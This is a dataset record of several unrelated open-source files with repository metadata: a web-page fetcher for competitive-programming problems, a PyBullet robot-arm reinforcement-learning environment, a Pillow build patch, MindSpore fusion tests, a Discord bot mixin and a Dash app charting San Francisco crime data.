e500d948e91bb70661adc3c2539b149704c734a1
[ "Apache-2.0" ]
5
2021-12-25T01:49:45.000Z
2022-03-27T10:30:14.000Z
cptk/core/fetcher.py
RealA10N/cptk
e500d948e91bb70661adc3c2539b149704c734a1
[ "Apache-2.0" ]
39
2021-12-24T16:35:07.000Z
2022-03-18T23:15:14.000Z
cptk/core/fetcher.py
RealA10N/cptk
e500d948e91bb70661adc3c2539b149704c734a1
[ "Apache-2.0" ]
2
2022-01-12T19:13:20.000Z
2022-01-12T19:32:05.000Z
from __future__ import annotations from typing import TYPE_CHECKING import pkg_resources from bs4 import BeautifulSoup from requests import session from cptk.scrape import PageInfo from cptk.scrape import Website from cptk.utils import cptkException if TYPE_CHECKING: from cptk.scrape import Problem class InvalidClone(cptkException): """ Raised when the clone command is called with a 'PageInfo' instance that doesn't describe anything that can be cloned. """ def __init__(self, info: PageInfo) -> None: self.info = info super().__init__(f"We don't know how to handle data from {info.url!r}") class UnknownWebsite(cptkException): """ Raised when trying to fetch information from a website that is not registed and can't be handled by cptk. """ def __init__(self, domain: str) -> None: self.domain = domain super().__init__(f"We don't know how to handle data from {domain!r}") class Fetcher: def __init__(self) -> None: self.session = session() self._load_websites() def _load_websites(self) -> list[type[Website]]: self._websites = [ point.load()() for point in pkg_resources.iter_entry_points('cptk_sites') ] self._domain_to_website = dict() for website in self._websites: domain = website.domain if isinstance(domain, str): self._domain_to_website[domain] = website else: for cur in domain: self._domain_to_website[cur] = website def page_to_problem(self, info: PageInfo) -> Problem: """ Recives an arbitrary page info instance and tries to match it with a Website class that knows how to handle this specific website. If cptk doesn't find a way to parse the given webpage, it raises the 'InvalidClone' exception. """ for website in self._websites: if website.is_problem(info): return website.to_problem(info) raise InvalidClone(info) def to_page(self, url: str) -> PageInfo: """ Makes an get http/s request to the given URL and returns the result as a PageInfo instance. """ if not url.startswith('http'): url = f'http://{url}' res = self.session.get(url) data = BeautifulSoup(res.content, 'lxml') return PageInfo(url, data)
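
# A hedged usage sketch of the Fetcher class above. The import path is inferred
# from the repository path of this record, the URL is a placeholder, and a real
# run needs at least one 'cptk_sites' entry point installed.
from cptk.core.fetcher import Fetcher, InvalidClone

fetcher = Fetcher()
page = fetcher.to_page('example.com/problems/1')  # placeholder URL
try:
    problem = fetcher.page_to_problem(page)
except InvalidClone:
    print('no registered website knows how to parse this page')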
31.441558
79
0.646014
2,104
0.869062
0
0
0
0
0
0
753
0.311029
bec8b40804691cfab7d99feee2707b808f11aaed
15,006
py
Python
machine_learning/deep_reinforcement_learning_grasping/drlgrasp/drlgrasp/pybullet_envs/kuka_reach_with_visual.py
Hinson-A/guyueclass
e59129526729542dccefa6c7232378a00dc0175a
[ "Apache-2.0" ]
227
2021-01-20T05:34:32.000Z
2022-03-29T12:43:05.000Z
machine_learning/deep_reinforcement_learning_grasping/drlgrasp/drlgrasp/pybullet_envs/kuka_reach_with_visual.py
passYYYY/guyueclass
2054ccec2f5e6c002727a5561b494a1046484504
[ "Apache-2.0" ]
1
2021-04-22T05:56:00.000Z
2021-05-26T06:00:17.000Z
machine_learning/deep_reinforcement_learning_grasping/drlgrasp/drlgrasp/pybullet_envs/kuka_reach_with_visual.py
passYYYY/guyueclass
2054ccec2f5e6c002727a5561b494a1046484504
[ "Apache-2.0" ]
239
2021-01-28T02:59:53.000Z
2022-03-29T08:02:17.000Z
import pybullet as p import pybullet_data import gym from gym import spaces from gym.utils import seeding import numpy as np from math import sqrt import random import time import math import cv2 import torch import os def random_crop(imgs, out): """ args: imgs: shape (B,C,H,W) out: output size (e.g. 84) """ n, c, h, w = imgs.shape crop_max = h - out + 1 w1 = np.random.randint(0, crop_max, n) h1 = np.random.randint(0, crop_max, n) cropped = np.empty((n, c, out, out), dtype=imgs.dtype) for i, (img, w11, h11) in enumerate(zip(imgs, w1, h1)): cropped[i] = img[:, h11:h11 + out, w11:w11 + out] return cropped class KukaReachVisualEnv(gym.Env): metadata = { 'render.modes': ['human', 'rgb_array'], 'video.frames_per_second': 50 } kMaxEpisodeSteps = 700 kImageSize = {'width': 96, 'height': 96} kFinalImageSize = {'width': 84, 'height': 84} def __init__(self, is_render=False, is_good_view=False): self.is_render = is_render self.is_good_view = is_good_view if self.is_render: p.connect(p.GUI) else: p.connect(p.DIRECT) self.x_low_obs = 0.2 self.x_high_obs = 0.7 self.y_low_obs = -0.3 self.y_high_obs = 0.3 self.z_low_obs = 0 self.z_high_obs = 0.55 self.x_low_action = -0.4 self.x_high_action = 0.4 self.y_low_action = -0.4 self.y_high_action = 0.4 self.z_low_action = -0.6 self.z_high_action = 0.3 self.step_counter = 0 self.urdf_root_path = pybullet_data.getDataPath() # lower limits for null space self.lower_limits = [-.967, -2, -2.96, 0.19, -2.96, -2.09, -3.05] # upper limits for null space self.upper_limits = [.967, 2, 2.96, 2.29, 2.96, 2.09, 3.05] # joint ranges for null space self.joint_ranges = [5.8, 4, 5.8, 4, 5.8, 4, 6] # restposes for null space self.rest_poses = [0, 0, 0, 0.5 * math.pi, 0, -math.pi * 0.5 * 0.66, 0] # joint damping coefficents self.joint_damping = [ 0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001 ] self.init_joint_positions = [ 0.006418, 0.413184, -0.011401, -1.589317, 0.005379, 1.137684, -0.006539 ] self.orientation = p.getQuaternionFromEuler( [0., -math.pi, math.pi / 2.]) self.camera_parameters = { 'width': 960., 'height': 720, 'fov': 60, 'near': 0.1, 'far': 100., 'eye_position': [0.59, 0, 0.8], 'target_position': [0.55, 0, 0.05], 'camera_up_vector': [1, 0, 0], # I really do not know the parameter's effect. 'light_direction': [ 0.5, 0, 1 ], # the direction is from the light source position to the origin of the world frame. 
} self.view_matrix = p.computeViewMatrixFromYawPitchRoll( cameraTargetPosition=[0.55, 0, 0.05], distance=.7, yaw=90, pitch=-70, roll=0, upAxisIndex=2) self.projection_matrix = p.computeProjectionMatrixFOV( fov=self.camera_parameters['fov'], aspect=self.camera_parameters['width'] / self.camera_parameters['height'], nearVal=self.camera_parameters['near'], farVal=self.camera_parameters['far']) p.configureDebugVisualizer(lightPosition=[5, 0, 5]) p.resetDebugVisualizerCamera(cameraDistance=1.5, cameraYaw=0, cameraPitch=-40, cameraTargetPosition=[0.55, -0.35, 0.2]) self.action_space = spaces.Box(low=np.array( [self.x_low_action, self.y_low_action, self.z_low_action]), high=np.array([ self.x_high_action, self.y_high_action, self.z_high_action ]), dtype=np.float32) self.observation_space = spaces.Box(low=0, high=1, shape=(1, self.kFinalImageSize['width'], self.kFinalImageSize['height'])) self.seed() self.reset() def seed(self, seed=None): self.np_random, seed = seeding.np_random(seed) return [seed] def reset(self): self.step_counter = 0 p.resetSimulation() # p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, 0) self.terminated = False p.setGravity(0, 0, -10) # 这些是周围那些白线,用来观察是否超过了obs的边界 p.addUserDebugLine( lineFromXYZ=[self.x_low_obs, self.y_low_obs, 0], lineToXYZ=[self.x_low_obs, self.y_low_obs, self.z_high_obs]) p.addUserDebugLine( lineFromXYZ=[self.x_low_obs, self.y_high_obs, 0], lineToXYZ=[self.x_low_obs, self.y_high_obs, self.z_high_obs]) p.addUserDebugLine( lineFromXYZ=[self.x_high_obs, self.y_low_obs, 0], lineToXYZ=[self.x_high_obs, self.y_low_obs, self.z_high_obs]) p.addUserDebugLine( lineFromXYZ=[self.x_high_obs, self.y_high_obs, 0], lineToXYZ=[self.x_high_obs, self.y_high_obs, self.z_high_obs]) p.addUserDebugLine( lineFromXYZ=[self.x_low_obs, self.y_low_obs, self.z_high_obs], lineToXYZ=[self.x_high_obs, self.y_low_obs, self.z_high_obs]) p.addUserDebugLine( lineFromXYZ=[self.x_low_obs, self.y_high_obs, self.z_high_obs], lineToXYZ=[self.x_high_obs, self.y_high_obs, self.z_high_obs]) p.addUserDebugLine( lineFromXYZ=[self.x_low_obs, self.y_low_obs, self.z_high_obs], lineToXYZ=[self.x_low_obs, self.y_high_obs, self.z_high_obs]) p.addUserDebugLine( lineFromXYZ=[self.x_high_obs, self.y_low_obs, self.z_high_obs], lineToXYZ=[self.x_high_obs, self.y_high_obs, self.z_high_obs]) p.loadURDF(os.path.join(self.urdf_root_path, "plane.urdf"), basePosition=[0, 0, -0.65]) self.kuka_id = p.loadURDF(os.path.join(self.urdf_root_path, "kuka_iiwa/model.urdf"), useFixedBase=True) table_uid = p.loadURDF(os.path.join(self.urdf_root_path, "table/table.urdf"), basePosition=[0.5, 0, -0.65]) p.changeVisualShape(table_uid, -1, rgbaColor=[1, 1, 1, 1]) self.object_id = p.loadURDF(os.path.join(self.urdf_root_path, "random_urdfs/000/000.urdf"), basePosition=[ random.uniform(self.x_low_obs, self.x_high_obs), random.uniform(self.y_low_obs, self.y_high_obs), 0.01 ]) self.num_joints = p.getNumJoints(self.kuka_id) for i in range(self.num_joints): p.resetJointState( bodyUniqueId=self.kuka_id, jointIndex=i, targetValue=self.init_joint_positions[i], ) self.robot_pos_obs = p.getLinkState(self.kuka_id, self.num_joints - 1)[4] p.stepSimulation() (_, _, px, _, _) = p.getCameraImage(width=960, height=960, viewMatrix=self.view_matrix, projectionMatrix=self.projection_matrix, renderer=p.ER_BULLET_HARDWARE_OPENGL) self.images = px p.enableJointForceTorqueSensor(bodyUniqueId=self.kuka_id, jointIndex=self.num_joints - 1, enableSensor=True) self.object_pos = p.getBasePositionAndOrientation(self.object_id)[0] self.images = self.images[:, :, : 
3] # the 4th channel is alpha channel, we do not need it. return self._process_image(self.images) def _process_image(self, image): """Convert the RGB pic to gray pic and add a channel 1 Args: image ([type]): [description] """ if image is not None: image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY) image = cv2.resize(image, (self.kImageSize['width'], self.kImageSize['height']))[None, :, :] / 255. return image else: return np.zeros((1, self.kImageSize['width'], self.kImageSize['height'])) def step(self, action): dv = 0.005 dx = action[0] * dv dy = action[1] * dv dz = action[2] * dv self.current_pos = p.getLinkState(self.kuka_id, self.num_joints - 1)[4] self.new_robot_pos = [ self.current_pos[0] + dx, self.current_pos[1] + dy, self.current_pos[2] + dz ] self.robot_joint_positions = p.calculateInverseKinematics( bodyUniqueId=self.kuka_id, endEffectorLinkIndex=self.num_joints - 1, targetPosition=[ self.new_robot_pos[0], self.new_robot_pos[1], self.new_robot_pos[2] ], targetOrientation=self.orientation, jointDamping=self.joint_damping, ) for i in range(self.num_joints): p.resetJointState( bodyUniqueId=self.kuka_id, jointIndex=i, targetValue=self.robot_joint_positions[i], ) p.stepSimulation() # 在代码开始部分,如果定义了is_good_view,那么机械臂的动作会变慢,方便观察 if self.is_good_view: time.sleep(0.05) self.step_counter += 1 return self._reward() def _reward(self): # 一定注意是取第4个值,请参考pybullet手册的这个函数返回值的说明 self.robot_state = p.getLinkState(self.kuka_id, self.num_joints - 1)[4] self.object_state = np.array( p.getBasePositionAndOrientation(self.object_id)[0]).astype( np.float32) square_dx = (self.robot_state[0] - self.object_state[0]) ** 2 square_dy = (self.robot_state[1] - self.object_state[1]) ** 2 square_dz = (self.robot_state[2] - self.object_state[2]) ** 2 # 用机械臂末端和物体的距离作为奖励函数的依据 self.distance = sqrt(square_dx + square_dy + square_dz) # print(self.distance) x = self.robot_state[0] y = self.robot_state[1] z = self.robot_state[2] # 如果机械比末端超过了obs的空间,也视为done,而且会给予一定的惩罚 terminated = bool(x < self.x_low_obs or x > self.x_high_obs or y < self.y_low_obs or y > self.y_high_obs or z < self.z_low_obs or z > self.z_high_obs) if terminated: reward = -0.1 self.terminated = True # 如果机械臂一直无所事事,在最大步数还不能接触到物体,也需要给一定的惩罚 elif self.step_counter > self.kMaxEpisodeSteps: reward = -0.1 self.terminated = True elif self.distance < 0.1: reward = 1 self.terminated = True else: reward = 0 self.terminated = False info = {'distance:', self.distance} (_, _, px, _, _) = p.getCameraImage(width=960, height=960, viewMatrix=self.view_matrix, projectionMatrix=self.projection_matrix, renderer=p.ER_BULLET_HARDWARE_OPENGL) self.images = px self.processed_image = self._process_image(self.images) # self.observation=self.robot_state self.observation = self.object_state return self.processed_image, reward, self.terminated, info def close(self): p.disconnect() def _get_force_sensor_value(self): force_sensor_value = p.getJointState(bodyUniqueId=self.kuka_id, jointIndex=self.num_joints - 1)[2][2] # the first 2 stands for jointReactionForces, the second 2 stands for Fz, # the pybullet methods' return is a tuple,so can not # index it with str like dict. I think it can be improved # that return value is a dict rather than tuple. 
return force_sensor_value class CustomSkipFrame(gym.Wrapper): """ Make a 4 frame skip, so the observation space will change to (4,84,84) from (1,84,84) Args: gym ([type]): [description] """ def __init__(self, env, skip=4): super(CustomSkipFrame, self).__init__(env) self.observation_space = spaces.Box(low=0, high=1, shape=(skip, self.kFinalImageSize['width'], self.kFinalImageSize['height'])) self.skip = skip def step(self, action): total_reward = 0 states = [] state, reward, done, info = self.env.step(action) for i in range(self.skip): if not done: state, reward, done, info = self.env.step(action) total_reward += reward states.append(state) else: states.append(state) states = np.concatenate(states, 0)[None, :, :, :] return random_crop(states.astype(np.float32), self.kFinalImageSize['width']), reward, done, info def reset(self): state = self.env.reset() states = np.concatenate([state for _ in range(self.skip)], 0)[None, :, :, :] return random_crop(states.astype(np.float32), self.kFinalImageSize['width']) if __name__ == '__main__': # 这一部分是做baseline,即让机械臂随机选择动作,看看能够得到的分数 import matplotlib.pyplot as plt env = KukaReachVisualEnv(is_render=False) env = CustomSkipFrame(env) print(env.observation_space.shape) print(env.action_space.shape) print(env.action_space.n) # for _ in range(20): # action=env.action_space.sample() # print(action) # env.step(action) # # state = env.reset() # print(state.shape) # img = state[0][0] # plt.imshow(img, cmap='gray') # plt.show()
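
# The cropping rule used by random_crop above, demonstrated with plain NumPy so
# it runs without PyBullet or gym; the batch below is synthetic example data.
import numpy as np

imgs = np.zeros((2, 1, 96, 96), dtype=np.float32)  # (B, C, H, W), as in the docstring
out = 84
crop_max = imgs.shape[2] - out + 1                 # highest valid top-left offset
h1, w1 = np.random.randint(0, crop_max, 2)
patch = imgs[0, :, h1:h1 + out, w1:w1 + out]
print(patch.shape)                                 # (1, 84, 84)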
36.159036
121
0.53212
14,041
0.912583
0
0
0
0
0
0
2,281
0.148252
bec8bbb28dfc0d99421b26ef588fd15b586c1fe9
509
py
Python
bucket_4C/python-Pillow/patches/patch-setup.py
jrmarino/ravensource
91d599fd1f2af55270258d15e72c62774f36033e
[ "FTL" ]
17
2017-04-22T21:53:52.000Z
2021-01-21T16:57:55.000Z
bucket_4C/python-Pillow/patches/patch-setup.py
jrmarino/ravensource
91d599fd1f2af55270258d15e72c62774f36033e
[ "FTL" ]
186
2017-09-12T20:46:52.000Z
2021-11-27T18:15:14.000Z
bucket_4C/python-Pillow/patches/patch-setup.py
jrmarino/ravensource
91d599fd1f2af55270258d15e72c62774f36033e
[ "FTL" ]
74
2017-09-06T14:48:01.000Z
2021-08-28T02:48:27.000Z
--- setup.py.orig 2019-07-02 19:13:39 UTC +++ setup.py @@ -465,9 +465,7 @@ class pil_build_ext(build_ext): _add_directory(include_dirs, "/usr/X11/include") elif ( - sys.platform.startswith("linux") - or sys.platform.startswith("gnu") - or sys.platform.startswith("freebsd") + sys.platform.startswith("nothing") ): for dirname in _find_library_dirs_ldconfig(): _add_directory(library_dirs, dirname)
36.357143
65
0.579568
97
0.19057
0
0
0
0
0
0
48
0.094303
bec8c0835477d8b4651705098efe6f5b0368b832
6,581
py
Python
tests/ut/cpp/python_input/gtest_input/pre_activate/ir_fusion_test.py
GeekHee/mindspore
896b8e5165dd0a900ed5a39e0fb23525524bf8b0
[ "Apache-2.0" ]
null
null
null
tests/ut/cpp/python_input/gtest_input/pre_activate/ir_fusion_test.py
GeekHee/mindspore
896b8e5165dd0a900ed5a39e0fb23525524bf8b0
[ "Apache-2.0" ]
null
null
null
tests/ut/cpp/python_input/gtest_input/pre_activate/ir_fusion_test.py
GeekHee/mindspore
896b8e5165dd0a900ed5a39e0fb23525524bf8b0
[ "Apache-2.0" ]
null
null
null
# Copyright 2019 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ from mindspore.ops import Primitive from mindspore.ops import operations as P from mindspore.ops.operations import _grad_ops as G from mindspore.ops import _constants as Constants # pylint: disable=unused-variable tuple_getitem = Primitive(Constants.kTupleGetItem) add = P.Add() allreduce = P.AllReduce() allreduce.add_prim_attr('fusion', 1) make_tuple = Primitive("make_tuple") conv = P.Conv2D(out_channel=64, kernel_size=7, mode=1, pad_mode="valid", pad=0, stride=1, dilation=1, group=1) bn = P.FusedBatchNorm() relu = P.ReLU() conv_bn1 = Primitive('ConvBN1') bn2_add_relu = Primitive('BN2AddRelu') bn2_relu = Primitive('BN2Relu') fused_bn1 = Primitive('FusedBN1') fused_bn2 = Primitive('FusedBN2') fused_bn3 = Primitive('FusedBN3') bn_grad = G.FusedBatchNormGrad() bn_grad1 = Primitive('BNGrad1') bn_grad2 = Primitive('BNGrad2') bn_grad3 = Primitive('BNGrad3') class FnDict: def __init__(self): self.fnDict = {} def __call__(self, fn): self.fnDict[fn.__name__] = fn def __getitem__(self, name): return self.fnDict[name] def test_bn_split(tag): """ test_split_bn_fusion """ fns = FnDict() @fns def before(x, scale, b, mean, variance): bn_output = bn(x, scale, b, mean, variance) item0 = tuple_getitem(bn_output, 0) return item0 @fns def after(x, scale, b, mean, variance): fused_bn1_output = fused_bn1(x) fused_bn2_input0 = tuple_getitem(fused_bn1_output, 0) fused_bn2_input1 = tuple_getitem(fused_bn1_output, 1) fused_bn2_output = fused_bn2(fused_bn2_input0, fused_bn2_input1, mean, variance) fused_bn3_input1 = tuple_getitem(fused_bn2_output, 0) fused_bn3_input2 = tuple_getitem(fused_bn2_output, 1) fused_bn3_output = fused_bn3(x, fused_bn3_input1, fused_bn3_input2, scale, b) output1 = tuple_getitem(fused_bn2_output, 2) output2 = tuple_getitem(fused_bn2_output, 3) output3 = tuple_getitem(fused_bn2_output, 0) output4 = tuple_getitem(fused_bn2_output, 1) output = make_tuple(fused_bn3_output, output1, output2, output3, output4) item0 = tuple_getitem(output, 0) return make_tuple(item0) return fns[tag] def test_bn_grad_split(tag): """ test_bn_grad_split """ fns = FnDict() @fns def before(dy, x, scale, save_mean, save_inv_variance): bn_grad_output = bn_grad(dy, x, scale, save_mean, save_inv_variance) item0 = tuple_getitem(bn_grad_output, 0) item1 = tuple_getitem(bn_grad_output, 1) item2 = tuple_getitem(bn_grad_output, 2) output = make_tuple(item0, item1, item2) res = tuple_getitem(output, 0) return res @fns def after(i0, i1, i2, i3, i4): bn_grad1_output = bn_grad1(i0, i1, i3) bn_grad1_item0 = tuple_getitem(bn_grad1_output, 0) bn_grad1_item1 = tuple_getitem(bn_grad1_output, 1) bn_grad1_item2 = tuple_getitem(bn_grad1_output, 2) bn_grad2_output = bn_grad2(bn_grad1_item0, bn_grad1_item1, i4, i2) bn_grad2_item0 = tuple_getitem(bn_grad2_output, 0) bn_grad2_item1 = tuple_getitem(bn_grad2_output, 1) bn_grad2_item2 = tuple_getitem(bn_grad2_output, 2) bn_grad2_item3 = 
tuple_getitem(bn_grad2_output, 3) bn_grad2_item4 = tuple_getitem(bn_grad2_output, 4) bn_grad3_output = bn_grad3(i0, bn_grad2_item2, bn_grad2_item3, bn_grad2_item4, bn_grad1_item2) bn_grad_make_tuple = make_tuple(bn_grad3_output, bn_grad2_item0, bn_grad2_item1) item0 = tuple_getitem(bn_grad_make_tuple, 0) item1 = tuple_getitem(bn_grad_make_tuple, 1) item2 = tuple_getitem(bn_grad_make_tuple, 2) output = make_tuple(item0, item1, item2) return make_tuple(tuple_getitem(output, 0)) return fns[tag] def test_all_reduce_fusion_all(tag): """ test_all_reduce_fusion_all """ fns = FnDict() @fns def before(x1, x2, x3, x4, x5): y1 = allreduce(x1) y2 = allreduce(x2) y3 = allreduce(x3) y4 = allreduce(x4) y5 = allreduce(x5) return make_tuple(y1, y2, y3, y4, y5) @fns def after(x1, x2, x3, x4, x5): ar = allreduce(x5, x4, x3, x2, x1) y5 = tuple_getitem(ar, 0) y4 = tuple_getitem(ar, 1) y3 = tuple_getitem(ar, 2) y2 = tuple_getitem(ar, 3) y1 = tuple_getitem(ar, 4) res = make_tuple(y1, y2, y3, y4, y5) return make_tuple(res) @fns def after1(x1, x2, x3, x4, x5): ar = allreduce(x1, x2, x3, x4, x5) y1 = tuple_getitem(ar, 0) y2 = tuple_getitem(ar, 1) y3 = tuple_getitem(ar, 2) y4 = tuple_getitem(ar, 3) y5 = tuple_getitem(ar, 4) res = make_tuple(y1, y2, y3, y4, y5) return make_tuple(res) return fns[tag] def test_all_reduce_fusion_group(tag): """ test_all_reduce_fusion_group """ fns = FnDict() @fns def before(x1, x2, x3, x4, x5): y1 = allreduce(x1) y2 = allreduce(x2) y3 = allreduce(x3) y4 = allreduce(x4) y5 = allreduce(x5) return make_tuple(y1, y2, y3, y4, y5) @fns def after1(x1, x2, x3, x4, x5): ar1 = allreduce(x5, x4) ar2 = allreduce(x3, x2, x1) y4 = tuple_getitem(ar1, 1) y5 = tuple_getitem(ar1, 0) y1 = tuple_getitem(ar2, 2) y2 = tuple_getitem(ar2, 1) y3 = tuple_getitem(ar2, 0) res = make_tuple(y1, y2, y3, y4, y5) return make_tuple(res) @fns def after2(x1, x2, x3, x4, x5): ar1 = allreduce(x1, x3, x5) ar2 = allreduce(x2, x4) y1 = tuple_getitem(ar1, 2) y3 = tuple_getitem(ar1, 1) y5 = tuple_getitem(ar1, 0) y2 = tuple_getitem(ar2, 1) y4 = tuple_getitem(ar2, 0) output = make_tuple(y1, y2, y3, y4, y5) return make_tuple(output) return fns[tag]
33.576531
110
0.647166
196
0.029783
0
0
4,348
0.66069
0
0
924
0.140404
bec9227899c9767af55354a2d39773951766ff07
486
py
Python
tdx/abc.py
TrainerDex/DiscordBot
7e7bb20c5ac76bed236a7458c31017b8ddd8b8be
[ "Apache-2.0" ]
2
2020-09-18T12:43:48.000Z
2020-11-10T00:34:15.000Z
tdx/abc.py
TrainerDex/DiscordBot
7e7bb20c5ac76bed236a7458c31017b8ddd8b8be
[ "Apache-2.0" ]
59
2020-07-24T00:04:53.000Z
2022-03-29T11:15:48.000Z
tdx/abc.py
TrainerDex/DiscordBot
7e7bb20c5ac76bed236a7458c31017b8ddd8b8be
[ "Apache-2.0" ]
1
2022-01-12T12:33:15.000Z
2022-01-12T12:33:15.000Z
from abc import ABC from typing import Dict from redbot.core import Config from redbot.core.bot import Red from trainerdex.client import Client class MixinMeta(ABC): """ Base class for well behaved type hint detection with composite class. Basically, to keep developers sane when not all attributes are defined in each mixin. """ def __init__(self, *_args): self.bot: Red self.config: Config self.client: Client self.emoji: Dict
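
# A dependency-free sketch of the pattern the MixinMeta docstring describes:
# shared attributes are declared once on the abstract base so every mixin
# type-checks against the composite class. The class and attribute names here
# are invented for illustration only.
from abc import ABC


class MixinBase(ABC):
    def __init__(self, *_args):
        self.counter: int  # declared once for all mixins


class CounterMixin(MixinBase):
    def bump(self) -> int:
        self.counter += 1  # the attribute is known to exist on the composite
        return self.counter


class Composite(CounterMixin):
    def __init__(self):
        self.counter = 0


print(Composite().bump())  # 1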
23.142857
89
0.699588
338
0.695473
0
0
0
0
0
0
176
0.36214
fe1f4c025bf53ebda91717d8cd83c5c619dbfc64
7,044
py
Python
app.py
PolinaRomanchenko/Victorious_Secret_DSCI_532
e83bc19169a1736618ac55f2ade40741583089fd
[ "MIT" ]
null
null
null
app.py
PolinaRomanchenko/Victorious_Secret_DSCI_532
e83bc19169a1736618ac55f2ade40741583089fd
[ "MIT" ]
null
null
null
app.py
PolinaRomanchenko/Victorious_Secret_DSCI_532
e83bc19169a1736618ac55f2ade40741583089fd
[ "MIT" ]
null
null
null
import dash import dash_core_components as dcc import dash_html_components as html import dash_bootstrap_components as dbc import pandas as pd import numpy as np import altair as alt import vega_datasets alt.data_transformers.enable('default') alt.data_transformers.disable_max_rows() app = dash.Dash(__name__, assets_folder='assets', external_stylesheets=[dbc.themes.BOOTSTRAP]) # Boostrap CSS. app.css.append_css({'external_url': 'https://codepen.io/amyoshino/pen/jzXypZ.css'}) # noqa: E501 server = app.server app.title = 'Dash app with pure Altair HTML' df = pd.read_csv('data/Police_Department_Incidents_-_Previous_Year__2016_.csv') # df = pd.read_csv("https://raw.github.ubc.ca/MDS-2019-20/DSCI_531_lab4_anas017/master/data/Police_Department_Incidents_-_Previous_Year__2016_.csv?token=AAAHQ0dLxUd74i7Zhzh1SJ_UuOaFVI3_ks5d5dT3wA%3D%3D") df['datetime'] = pd.to_datetime(df[["Date","Time"]].apply(lambda x: x[0].split()[0] +" "+x[1], axis=1), format="%m/%d/%Y %H:%M") df['hour'] = df['datetime'].dt.hour df.dropna(inplace=True) top_4_crimes = df['Category'].value_counts()[:6].index.to_list() top_4_crimes top_4_crimes.remove("NON-CRIMINAL") top_4_crimes.remove("OTHER OFFENSES") # top 4 crimes df subset df_t4 = df[df["Category"].isin(top_4_crimes)].copy() def make_plot_top(df_new=df_t4): # Create a plot of the Displacement and the Horsepower of the cars dataset # making the slider slider = alt.binding_range(min = 0, max = 23, step = 1) select_hour = alt.selection_single(name='select', fields = ['hour'], bind = slider, init={'hour': 0}) #begin of my code # typeDict = {'ASSAULT':'quantitative', # 'VANDALISM':'quantitative', # 'LARCENY/THEFT':'quantitative', # 'VEHICLE THEFT':'quantitative' # } # end chart = alt.Chart(df_new).mark_bar(size=30).encode( x=alt.X('Category',type='nominal', title='Category'), y=alt.Y('count()', title = "Count" , scale = alt.Scale(domain = (0,3300))), tooltip='count()' ).properties( title = "Per hour crime occurrences for the top 4 crimes", width=500, height = 315 ).add_selection( select_hour ).transform_filter( select_hour ) return chart def make_plot_bot(data=df_t4): chart_1 = alt.Chart(data).mark_circle(size=3, opacity = 0.8).encode( longitude='X:Q', latitude='Y:Q', color = alt.Color('PdDistrict:N', legend = alt.Legend(title = "District")), tooltip = 'PdDistrict' ).project( type='albersUsa' ).properties( width=450, height=350 ) chart_2 = alt.Chart(data).mark_bar().encode( x=alt.X('PdDistrict:N', axis=None, title="District"), y=alt.Y('count()', title="Count of reports"), color=alt.Color('PdDistrict:N', legend=alt.Legend(title="District")), tooltip=['PdDistrict', 'count()'] ).properties( width=450, height=350 ) # A dropdown filter crimes_dropdown = alt.binding_select(options=list(data['Category'].unique())) crimes_select = alt.selection_single(fields=['Category'], bind=crimes_dropdown, name="Pick\ Crime") combine_chart = (chart_2 | chart_1) filter_crimes = combine_chart.add_selection( crimes_select ).transform_filter( crimes_select ) return filter_crimes body = dbc.Container( [ dbc.Row( [ dbc.Col( [ html.H2("San Francisco Crime"), html.P( """\ When looking for a place to live or visit, one important factor that people will consider is the safety of the neighborhood. Searching that information district by district could be time consuming and exhausting. It is even more difficult to compare specific crime statistics across districts such as the crime rate at a certain time of day. 
It would be useful if people can look up crime related information across district on one application. Our app aims to help people make decisions when considering their next trip or move to San Francisco, California via visually exploring a dataset of crime statistics. The app provides an overview of the crime rate across neighborhoods and allows users to focus on more specific information through filtering of geological location, crime rate, crime type or time of the crime. Use the box below to choose crimes of interest. """ ), dcc.Dropdown( id = 'drop_selection_crime', options=[{'label': i, 'value': i} for i in df_t4['Category'].unique() ], style={'height': '20px', 'width': '400px'}, value=df_t4['Category'].unique(), multi=True) ], md=5, ), dbc.Col( [ dbc.Row( [ html.Iframe( sandbox = "allow-scripts", id = "plot_top", height = "500", width = "650", style = {"border-width": "0px"}, srcDoc = make_plot_top().to_html() ) ] ) ] ), ] ), dbc.Row( html.Iframe( sandbox='allow-scripts', id='plot_bot', height='500', width='1200', style={'border-width': '0px'}, srcDoc= make_plot_bot().to_html() ) ) ], className="mt-4", ) app.layout = html.Div(body) @app.callback([dash.dependencies.Output('plot_top', 'srcDoc'), dash.dependencies.Output('plot_bot', 'srcDoc')], [dash.dependencies.Input('drop_selection_crime', 'value')] ) def update_df(chosen): new_df = df_t4[(df_t4["Category"].isin(chosen))] updated_plot_top = make_plot_top(new_df).to_html() updated_plot_bottom = make_plot_bot(new_df).to_html() return updated_plot_top, updated_plot_bottom if __name__ == '__main__': app.run_server(debug=False)
38.917127
203
0.534923
0
0
0
0
423
0.060051
0
0
2,693
0.382311
fe2001122588d2b0248d76d502b21c18d29d729d
40
py
Python
catkin_ws/src:/opt/ros/kinetic/lib/python2.7/dist-packages:/home/bala/duckietown/catkin_ws/src:/home/bala/duckietown/catkin_ws/src/lib/python2.7/site-packages/geometry/subspaces/__init__.py
johnson880319/Software
045894227f359e0a3a3ec5b7a53f8d1ebc06acdd
[ "CC-BY-2.0" ]
null
null
null
catkin_ws/src:/opt/ros/kinetic/lib/python2.7/dist-packages:/home/bala/duckietown/catkin_ws/src:/home/bala/duckietown/catkin_ws/src/lib/python2.7/site-packages/geometry/subspaces/__init__.py
johnson880319/Software
045894227f359e0a3a3ec5b7a53f8d1ebc06acdd
[ "CC-BY-2.0" ]
null
null
null
catkin_ws/src:/opt/ros/kinetic/lib/python2.7/dist-packages:/home/bala/duckietown/catkin_ws/src:/home/bala/duckietown/catkin_ws/src/lib/python2.7/site-packages/geometry/subspaces/__init__.py
johnson880319/Software
045894227f359e0a3a3ec5b7a53f8d1ebc06acdd
[ "CC-BY-2.0" ]
null
null
null
# coding=utf-8 from .subspaces import *
13.333333
24
0.725
0
0
0
0
0
0
0
0
14
0.35
fe2070ac8557cbd4275cc5e584c79388af700674
2,510
py
Python
detection/contor.py
chika626/chainer_rep
